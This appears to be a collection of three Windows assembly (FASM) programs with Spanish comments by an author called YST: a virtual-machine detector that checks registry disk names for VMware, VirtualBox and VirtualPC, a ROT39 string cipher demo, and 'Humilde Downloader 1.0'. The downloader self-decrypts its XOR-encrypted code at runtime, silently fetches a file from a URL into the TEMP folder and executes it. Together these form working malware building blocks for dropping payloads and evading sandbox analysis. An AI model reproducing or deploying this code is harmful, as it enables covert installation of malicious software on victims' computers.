include 'win32ax.inc'

.code
start:
stdcall IsVirtualPCPresent
cmp eax,0
jne .salir
invoke MessageBox,0,"No estamos en una maquina virtual",0,0
.salir:
invoke ExitProcess,0
;IsVirtualPCPresent
;Autor: YST
;Basado en un la funcion IsVirtualPCPresent de cobein
;
;
proc IsVirtualPCPresent
locals
lBuffer rb 500
endl
stdcall LeerRegistro,80000002h,iClave,iCero,addr lBuffer
cmp eax,0
je .no
stdcall cInstr,addr lBuffer,iVIRTUAL
cmp eax,0
je @f
mov eax,1
jmp .salir
@@:
stdcall cInstr,addr lBuffer,iVMWARE
cmp eax,0
je @f
mov eax,2
jmp .salir
@@:
stdcall cInstr,addr lBuffer,iVBOX
cmp eax,0
je @f
mov eax,3
jmp .salir
@@:
.no:
xor eax,eax
.salir:
ret
iClave db 'SYSTEM\ControlSet001\Services\Disk\Enum',0
iCero db '0',0
iVIRTUAL db 'VIRTUAL',0
iVMWARE db 'VMWARE',0
iVBOX db 'VBOX',0
endp
proc LeerRegistro,cHKEY,cCadena,cCampo,cBuffer
locals
temp dd ?
Result dd ?
endl
mov [temp],MAX_PATH*2
invoke RegOpenKeyEx,[cHKEY],[cCadena],0,KEY_READ, addr Result
.if eax <> 0 ;Si no hay datos devolvemos 0
xor eax,eax
jmp .salir
.endif

lea ebx,[temp]
invoke RegQueryValueEx ,[Result],[cCampo],0,0,[cBuffer],ebx
.if eax <> 0 ;Si no hay datos devolvemos 0
xor eax,eax
jmp .salir
.endif
mov eax,1
.salir:
ret
endp
;////////////////////////////////////////////////////////////////////////////////////////////////////
;//Descripción: Funcion que ve si la segunda cadena se encuentra dentro de la primera //
;//c1 = Cadena //
;//c2 = Cadena que se buscara en c1 //
;// Retorna: //
;// Si no se encuentra o hay error retorna FALSE , en el caso de que se encuentre devuelve eax//
;// apuntandoa la posicion de c1 donde se encontro c2 //
;// by YST //
;////////////////////////////////////////////////////////////////////////////////////////////
proc cInstr,c1,c2
push edi esi ebx ecx edx
stdcall Len,[c2]
mov edi,eax
stdcall Len,[c1]
mov esi,eax
cmp edi,esi
jg .Falso
mov edx,[c1]
mov ebx,[c2]
dec edx
inc esi
.bucle:
dec esi
inc edx
mov cl,byte[edx+edi]
mov byte[edx+edi],0
stdcall comparar,edx,[c2]
mov byte[edx+edi],cl
.if eax = 0
mov eax,edx
jmp .salir
.endif
cmp esi,0
jne .bucle
.Falso:
mov eax,FALSE
.salir:
pop edx ecx ebx esi edi
ret
endp
proc comparar ,SRC,DST ;Funcion que compara
push edi ecx esi
mov ecx,-1
mov edi,[SRC]
mov al,0
repnz scasb
mov eax,ecx
not eax
mov ecx,eax
mov esi,[SRC]
mov edi,[DST]
repz cmpsb
mov eax,1
jnz Next
dec eax
Next:
pop esi ecx edi
ret
endp
proc Len,cCadena ;Funcion que mide la cadena
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb
mov eax,ecx
not eax
dec eax
pop edi ecx
ret
endp
.end start

include 'win32ax.inc'
.code
start:
stdcall Len,"Hola mundo."
mov ebx,eax
stdcall ROT39,"Hola mundo." ,eax
mov esi,eax
invoke MessageBox,0,eax,"Encriptado:",0
stdcall ROT39,esi ,ebx
invoke MessageBox,0,eax,"Desencriptado:",0
invoke ExitProcess,0
LOWER_LIMIT = 48
CHARMAP = 39
UPPER_LIMIT = 125
proc ROT39,pString,pLargo
locals
nCode dd ?
endl
mov eax,[pLargo]
inc eax
invoke GlobalAlloc,GPTR,eax
mov ebx,eax
stdcall cRtlMoveMemory,ebx,[pString],[pLargo]
dec [pLargo]
xor esi,esi
dec esi
.bucle:
inc esi
mov eax,ebx
add eax,esi
movzx ecx,byte[eax]
mov [nCode] ,ecx

.if [nCode] >= LOWER_LIMIT & [nCode] <= UPPER_LIMIT
mov eax,[nCode]
add eax,CHARMAP
mov [nCode],eax

.if [nCode] > UPPER_LIMIT
mov eax,[nCode]
sub eax, UPPER_LIMIT
add eax,LOWER_LIMIT
dec eax
mov [nCode] ,eax
.endif
.endif
mov eax,ebx
add eax,esi
mov ecx,[nCode]
mov byte[eax],cl
cmp esi,[pLargo]
jne .bucle

mov eax,ebx
ret
endp
proc Len,cCadena ;Funcion que mide la cadena
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb
mov eax,ecx
not eax
dec eax
pop edi ecx
ret
endp
;Descripcion: Esta función funciona igual que la winapi RtlMoveMemory
; by YST
proc cRtlMoveMemory,cBuffer,Cpuntero,cCantidad
push esi edi
xchg edi,[cBuffer]
xchg esi,[Cpuntero]
.bucleb:
dec [cCantidad]
movsb
cmp [cCantidad],0
jge .bucleb
pop edi esi
ret
endp
.end start

;Humilde Downloader 1.0
; by
; y y yyy yyyyyyyyyyyyy
; y y y y
; y y yyyyyy y
; yy y y
; y y y
; y y y
; y yyyyyyy y
; ysk_sft@hotmail.com
; diariodeyst.blogspot.com
macro invoke proc,[arg] ; indirectly call STDCALL procedure
{ common
if ~ arg eq
reverse
pushd arg
common
end if
call [proc] }
macro allow_nesting
{ macro pushd value
\{ match ,value \\{
pushx equ \\}
match =pushx =invoke proc,pushx value \\{
allow_nesting
invoke proc
purge pushd,invoke,stdcall,cinvoke,ccall
push eax
pushx equ \\}
match =pushx =stdcall proc,pushx value \\{
allow_nesting
stdcall proc
purge pushd,invoke,stdcall,cinvoke,ccall
push eax
pushx equ \\}
match =pushx =cinvoke proc,pushx value \\{
allow_nesting
cinvoke proc
purge pushd,invoke,stdcall,cinvoke,ccall
push eax
pushx equ \\}
match =pushx =ccall proc,pushx value \\{
allow_nesting
ccall proc
purge pushd,invoke,stdcall,cinvoke,ccall
push eax
pushx equ \\}
match =pushx,pushx \\{
pushd <value>
pushx equ \\}
restore pushx \}
macro invoke proc,[arg]
\{ \reverse pushd <arg>
\common call [proc] \}
macro stdcall proc,[arg]
\{ \reverse pushd <arg>
\common call proc \}
macro cinvoke proc,[arg]
\{ \common \local size
size = 0
if ~ arg eq
\reverse pushd <arg>
size = size+4
match =double any,arg \\{ size = size \\}
\common end if
call [proc]
if size
add esp,size
end if \}
macro ccall proc,[arg]
\{ \common \local size
size = 0
if ~ arg eq
\reverse pushd <arg>
size = size+4
match =double any,arg \\{ size = size+4 \\}
\common end if
call proc
if size
add esp,size
end if \} }

macro pushd value
{ match first=,more, value \{ \local ..continue
call ..continue
db value,0
..continue:
pushd equ \}
match pushd =addr var,pushd value \{ \local ..opcode,..address
virtual at 0
label ..address at var
mov eax,dword [..address]
load ..opcode from 0
end virtual
if ..opcode = 0A1h
push var
else
lea edx,[..address]
push edx
end if
pushd equ \}
match pushd =double [var],pushd value \{
push dword [var+4]
push dword [var]
pushd equ \}
match pushd =double =ptr var,pushd value \{
push dword [var+4]
push dword [var]
pushd equ \}
match pushd =double num,pushd value \{ \local ..high,..low
virtual at 0
dq num
load ..low dword from 0
load ..high dword from 4
end virtual
push ..high
push ..low
pushd equ \}
match pushd,pushd \{ \local ..continue
if value eqtype ''
call ..continue
db value,0
..continue:
else
push value
end if
pushd equ \}
restore pushd }

allow_nesting

macro import lib,[functions]
{ common macro import_#lib \{ import lib,functions \} }
format pe gui 4.0

macro proc [args] ; define procedure
{ common
match name params, args>
\{ define@proc name,<params \} }

prologue@proc equ prologuedef

macro prologuedef procname,flag,parmbytes,localbytes,reglist
{ if parmbytes | localbytes
push ebp
mov ebp,esp
if localbytes
sub esp,localbytes
end if
end if
irps reg, reglist \{ push reg \} }

epilogue@proc equ epiloguedef

macro epiloguedef procname,flag,parmbytes,localbytes,reglist
{ irps reg, reglist \{ reverse pop reg \}
if parmbytes | localbytes
leave
end if
if flag and 10000b
retn
else
retn parmbytes
end if }

macro define@proc name,statement
{ local params,flag,regs,parmbytes,localbytes,current
if used name
name:
match =stdcall args, statement \{ params equ args
flag = 11b \}
match =stdcall, statement \{ params equ
flag = 11b \}
match =c args, statement \{ params equ args
flag = 10001b \}
match =c, statement \{ params equ
flag = 10001b \}
match =params, params \{ params equ statement
flag = 0 \}
virtual at ebp+8
match =uses reglist=,args, params \{ regs equ reglist
params equ args \}
match =regs =uses reglist, regs params \{ regs equ reglist
params equ \}
match =regs, regs \{ regs equ \}
match =,args, params \{ defargs@proc args \}
match =args@proc args, args@proc params \{ defargs@proc args \}
parmbytes = $ - (ebp+8)
end virtual
name # % = parmbytes/4
all@vars equ
current = 0
match prologue:reglist, prologue@proc:<regs> \{ prologue name,flag,parmbytes,localbytes,reglist \}
macro locals
\{ virtual at ebp-localbytes+current
macro label def \\{ match . type,def> \\\{ deflocal@proc .,label,<type \\\} \\}
struc db [val] \\{ \common deflocal@proc .,db,val \\}
struc du [val] \\{ \common deflocal@proc .,du,val \\}
struc dw [val] \\{ \common deflocal@proc .,dw,val \\}
struc dp [val] \\{ \common deflocal@proc .,dp,val \\}
struc dd [val] \\{ \common deflocal@proc .,dd,val \\}
struc dt [val] \\{ \common deflocal@proc .,dt,val \\}
struc dq [val] \\{ \common deflocal@proc .,dq,val \\}
struc rb cnt \\{ deflocal@proc .,rb cnt, \\}
struc rw cnt \\{ deflocal@proc .,rw cnt, \\}
struc rp cnt \\{ deflocal@proc .,rp cnt, \\}
struc rd cnt \\{ deflocal@proc .,rd cnt, \\}
struc rt cnt \\{ deflocal@proc .,rt cnt, \\}
struc rq cnt \\{ deflocal@proc .,rq cnt, \\} \}
macro endl
\{ purge label
restruc db,du,dw,dp,dd,dt,dq
restruc rb,rw,rp,rd,rt,rq
current = $-(ebp-localbytes)
end virtual \}
macro ret operand
\{ match any, operand \\{ retn operand \\}
match , operand \\{ match epilogue:reglist, epilogue@proc:<regs>
\\\{ epilogue name,flag,parmbytes,localbytes,reglist \\\} \\} \}
macro finish@proc \{ localbytes = (((current-1) shr 2)+1) shl 2
end if \} }

macro defargs@proc [arg]
{ common
if ~ arg eq
forward
local ..arg,current@arg
match argname:type, arg
\{ current@arg equ argname
label ..arg type
argname equ ..arg
if dqword eq type
dd ?,?,?,?
else if tbyte eq type
dd ?,?,?
else if qword eq type | pword eq type
dd ?,?
else
dd ?
end if \}
match =current@arg,current@arg
\{ current@arg equ arg
arg equ ..arg
..arg dd ? \}
common
args@proc equ current@arg
forward
restore current@arg
common
end if }

macro deflocal@proc name,def,[val]
{ common
match vars, all@vars \{ all@vars equ all@vars, \}
all@vars equ all@vars name
forward
local ..var,..tmp
match =label,def \{ ..tmp equ \}
match tmp,..tmp \{ ..var def val \}
match ,..tmp \{ label ..var val \}
match =?, val \{ ..tmp equ \}
match any =?, val \{ ..tmp equ \}
match any (=?), val \{ ..tmp equ \}
match tmp : value, ..tmp : val
\{ tmp: end virtual
initlocal@proc ..var,def value
virtual at tmp\}
common
match first rest, ..var, \{ name equ first \} }

macro initlocal@proc name,def
{ virtual at name
def
size@initlocal = $ - name
end virtual
position@initlocal = 0
while size@initlocal > position@initlocal
virtual at name
def
if size@initlocal - position@initlocal < 2
current@initlocal = 1
load byte@initlocal byte from name+position@initlocal
else if size@initlocal - position@initlocal < 4
current@initlocal = 2
load word@initlocal word from name+position@initlocal
else
current@initlocal = 4
load dword@initlocal dword from name+position@initlocal
end if
end virtual
if current@initlocal = 1
mov byte [name+position@initlocal],byte@initlocal
else if current@initlocal = 2
mov word [name+position@initlocal],word@initlocal
else
mov dword [name+position@initlocal],dword@initlocal
end if
position@initlocal = position@initlocal + current@initlocal
end while }

macro endp
{ purge ret,locals,endl
finish@proc
purge finish@proc
restore regs@proc
match all,args@proc \{ restore all \}
restore args@proc
match all,all@vars \{ restore all \} }

macro local [var]
{ common
locals
forward done@local equ
match varname[count]:vartype, var
\{ match =BYTE, vartype \\{ varname rb count
restore done@local \\}
match =WORD, vartype \\{ varname rw count
restore done@local \\}
match =DWORD, vartype \\{ varname rd count
restore done@local \\}
match =PWORD, vartype \\{ varname rp count
restore done@local \\}
match =QWORD, vartype \\{ varname rq count
restore done@local \\}
match =TBYTE, vartype \\{ varname rt count
restore done@local \\}
match =DQWORD, vartype \\{ label varname dqword
rq count+count
restore done@local \\}
match , done@local \\{ virtual
varname vartype
end virtual
rb count*sizeof.\#vartype
restore done@local \\} \}
match :varname:vartype, done@local:var
\{ match =BYTE, vartype \\{ varname db ?
restore done@local \\}
match =WORD, vartype \\{ varname dw ?
restore done@local \\}
match =DWORD, vartype \\{ varname dd ?
restore done@local \\}
match =PWORD, vartype \\{ varname dp ?
restore done@local \\}
match =QWORD, vartype \\{ varname dq ?
restore done@local \\}
match =TBYTE, vartype \\{ varname dt ?
restore done@local \\}
match =DQWORD, vartype \\{ label varname dqword
dq ?,?
restore done@local \\}
match , done@local \\{ varname vartype
restore done@local \\} \}
match ,done@local
\{ var
restore done@local \}
common
endl }
macro encrypt dstart,dsize {
local ..char,..key,..shift
repeat dsize
load ..char from dstart+%-1
..char = ..char xor $FA
store ..char at dstart+%-1
end repeat
}
entry start
section '.text' code readable executable writeable
proc EncriptacionXOR,cCadena,cTamaño
push ebx
xor ebx,ebx
mov ebx,[cTamaño]
jmp .Start
.Start:
mov eax,[cCadena]
inc ebx
dec eax
.bucle:
dec ebx
cmp ebx,0
jbe .salir
inc eax
xor byte[eax],$FA
jmp .bucle
.salir:
pop ebx
ret
endp
proc start
stdcall EncriptacionXOR,InicioA,FinA-InicioA ;Desencriptamos
InicioA:
invoke CreateThread , 0, 0,DownloadFile,"Aqui va la URL" ,0 , 0;Creamos el hilo para descargar
invoke WaitForSingleObject,eax,-1 ;Esperamos que se cierre el hilo
invoke CreateThread , 0, 0,[ExitProcess],0 ,0 , 0;Salimos

endp
proc DownloadFile,pUrl
locals
MAX_PATH = 260
bwrite dd ?
f rb MAX_PATH*2
handleCreado dd ?
hSession dd ?
hUrl dd ?
buflong dd ?
lbuffer rb 800
endl
stdcall Len,[pUrl]
add eax,[pUrl]

.bucle:
dec eax
cmp byte[eax],"."
jne .bucle
mov edi,eax ;Obtenemos la extención
INVALID_HANDLE_VALUE = -1
invoke GetEnvironmentVariable,"TEMP", addr f,MAX_PATH ;Obtenemos la ruta de los archivos temporales
stdcall Len,addr f
lea ecx,[f]
add eax,ecx
mov ebx,eax
RDTSC
invoke wsprintf,ebx,"\%d%s",eax,edi
invoke CreateFileA,addr f, 40000000h, 0, 0, 2, 0, 0 ;Creamos el archivo
cmp eax,INVALID_HANDLE_VALUE
je .exit
mov [handleCreado],eax
invoke InternetOpen,0,0,0,0,0
cmp eax,INVALID_HANDLE_VALUE
je .exit
mov [hSession],eax

invoke InternetOpenUrl,[hSession],[pUrl],0,0,0,0
cmp eax,INVALID_HANDLE_VALUE
je .exit
mov [hUrl],eax
.download:
invoke InternetReadFile,[hUrl],addr lbuffer,800,addr buflong ;Leemos el archivo
or [buflong],0
jz .close

invoke WriteFile,[handleCreado],addr lbuffer,[buflong],addr bwrite,0 ;Escribimos el archivo
jmp .download
.close:
invoke CloseHandle,[handleCreado] ;Cerramos los handle
invoke InternetCloseHandle,[hUrl]
invoke InternetCloseHandle,[hSession]
invoke ShellExecute,0, "Open", addr f,0, 0, 1 ;Ejecutamos el archivo descargado

invoke Sleep,1000 ;Dormimos 1 segundo
.exit:
invoke ExitThread,0 ;Salimos del hilo
endp
proc Len,cCadena ;Funcion que mide la cadena
push ecx edi
mov ecx,-1
mov edi,[cCadena]
mov al,0
repnz scasb
mov eax,ecx
not eax
dec eax
pop edi ecx
ret
endp
FinA:
encrypt InicioA,FinA-InicioA
section '.idata' import data readable writeable

macro library [name,string]
{ forward
local _label
if defined name#.redundant
if ~ name#.redundant
dd RVA name#.lookup,0,0,RVA _label,RVA name#.address
end if
end if
name#.referred = 1
common
dd 0,0,0,0,0
forward
if defined name#.redundant
if ~ name#.redundant
_label db string,0
rb RVA $ and 1
end if
end if }

macro import name,[label,string]
{ common
if defined name#.referred
name#.lookup:
forward
if used label
if string eqtype ''
local _label
dd RVA _label
else
dd 80000000h + string
end if
end if
common
if $ > name#.lookup
name#.redundant = 0
dd 0
else
name#.redundant = 1
end if
name#.address:
forward
if used label
if string eqtype ''
label dd RVA _label
else
label dd 80000000h + string
end if
end if
common
if ~ name#.redundant
dd 0
end if
forward
if used label & string eqtype ''
_label dw 0
db string,0
rb RVA $ and 1
end if
common
end if }

library kernel32,'kernel32.dll',Wininet,'Wininet.dll' ,user32,'user32.dll', shell32,'SHELL32.DLL'
import kernel32,CreateThread,'CreateThread',WaitForSingleObject,'WaitForSingleObject',GetEnvironmentVariable,'GetEnvironmentVariableA' ,\
ExitProcess,'ExitProcess',CreateFileA,'CreateFileA',WriteFile,'WriteFile',CloseHandle,'CloseHandle' ,Sleep,'Sleep',ExitThread,'ExitThread'
import user32,wsprintf,'wsprintfA'
import shell32,ShellExecute,'ShellExecuteA'
import Wininet,InternetOpen,'InternetOpenA',InternetOpenUrl,'InternetOpenUrlA',InternetCloseHandle,'InternetCloseHandle',InternetReadFile,'InternetReadFile'